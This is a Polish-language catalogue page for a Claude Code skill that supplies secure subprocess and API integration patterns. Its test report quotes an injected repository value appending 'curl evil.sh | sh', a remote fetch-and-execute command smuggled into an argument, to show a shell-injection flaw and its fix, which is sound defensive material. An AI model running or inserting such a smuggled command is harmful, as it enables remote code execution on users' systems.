API Integration Patterns

Bezpieczne dla podprocesów wzorce API/CLI: brak shell=True, biała lista poleceń, cofanie ponawiania prób, walidacja tokenów.

Autor: akaszubski · akaszubski/autonomous-dev

Testowano · Działa ★ 8.4/10

API Integration Patterns — Bezpieczne dla podprocesów wzorce API/CLI: brak shell=True, biała lista poleceń, cofanie ponawiania prób, walidacja tokenów.

Co robi ten skill

Umiejętność wzorców referencyjnych, która dostarcza bezpieczne wzorce kodu dla podprocesów, GitHub CLI, ponawiania prób z cofaniem, uwierzytelniania i ograniczania przepustowości, gdy Claude pisze kod integracji zewnętrznego API lub CLI. Uruchamia się na słowa kluczowe subprocess/gh-cli/API-call/retry/auth i wyraźnie wyklucza edycje wewnętrznych funkcji lub tylko konfiguracji.

Raport z testu

Rzeczywisty test CWE-78: kod bazowy używał shell=True z nazwą repozytorium w f-stringu, pozwalając spreparowanej wartości repozytorium dodać 'curl evil.sh | sh'; wersja umiejętności z tablicą argv + shell=False przepuściła ten sam złośliwy ciąg znaków przez gh jako jeden nieaktywny argument. Konkretne, nie kosmetyczne.

Testowano: 2026-07-15 · Claude Code 2.x (agent harness)

Instalacja

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Komendy i przykładowe prompty

  • /api-integration-patternsBezpieczne dla podprocesów wzorce API/CLI: brak shell=True, biała lista poleceń, cofanie ponawiania prób, walidacja tokenów.

Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk